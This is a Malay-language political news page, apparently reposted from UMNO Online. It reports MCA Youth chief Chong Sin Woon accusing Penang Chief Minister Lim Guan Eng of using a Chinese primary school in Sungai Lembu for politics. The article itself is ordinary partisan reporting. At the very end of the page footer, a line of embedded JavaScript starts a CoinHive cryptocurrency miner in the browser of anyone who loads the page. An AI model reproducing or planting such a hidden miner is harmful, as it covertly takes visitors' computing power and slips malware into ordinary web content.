© Copyright 2017, All Rights Reserved
Home / Politik / Guan Eng Diminta Berhenti Jadikan Sekolah Sebagai Pentas Berpolitik – UMNO Online

Guan Eng Diminta Berhenti Jadikan Sekolah Sebagai Pentas Berpolitik – UMNO Online

GEORGE TOWN, 12 Okt – Ketua Menteri Pulau Pinang Lim Guan Eng diminta berhenti menjadikan sekolah sebagai pentas untuk berpolitik dan menyalahkan pihak lain kerana tidak diberi kebenaran memasuki Sekolah Jenis Kebangsaan Cina (SJKC) Sungai Lembu, di Penanti, baru-baru ini.

Ketua Pemuda MCA Datuk Chong Sin Woon berkata isu itu sebenarnya tidak timbul kerana Lim sebelum ini telah banyak kali melawat sekolah-sekolah di bawah Kementerian Pendidikan.

“Sebenarnya Jabatan Pendidikan Negeri Pulau Pinang tidak membenarkan beliau (Lim) memasuki sekolah itu kerana ketika itu terdapat isu di Sungai Lembu,” katanya kepada pemberita selepas merasmikan Konvensyen Pendidikan 2017 Kesatuan Kebangsan Guru-Guru Besar Malaysia Sekolah Jenis Kebangsaan Cina (SJKC) di sini hari ini.

Chong yang juga Timbalan Menteri Pendidikan II berkata Lim cuba menggunakan sekolah bagi berjumpa dengan penduduk Sungai Lembu untuk memberikan sumbangan kepada penduduk.

“Jadi jelas lawatan itu bermotifkan politik… kita hendak mempertahankan sekolah kita, yang lain-lain tak ada isu pun. Beliau bebas menghadiri program di sekolah-sekolah seluruh negeri ini kerana menjadi tanggungjawab kerajaan negeri untuk membantu kerajaan persekutuan membangunkan sistem pendidikan,” katanya.

Dalam pada itu Chong berkata isu itu telah diputar belit oleh Lim bagi memberi gambaran bahawa kerajaan persekutuan bertindak secara tidak adil kepada beliau.

Lim sebelum ini melahirkan rasa tidak puas hati ekoran tidak dibenarkan memasuki sekolah berkenaan untuk menyampaikan bantuan pada 26 Ogos lepas dan menyifatkan tindakan itu menunjukkan sikap tidak adil dan dwistandard Kementerian Pendidikan kepada kerajaan negeri yang diterajui parti politik berlainan ideologi.



Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Konkrit Perumahan Tidak Selamat, Guan Eng Perjudi Nyawa Rakyat Pulau Pinang – Huan

1.Saya merujuk kepada satu kenyataan yang dikeluarkan oleh Ketua Pegawai Eksekutif JKP ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();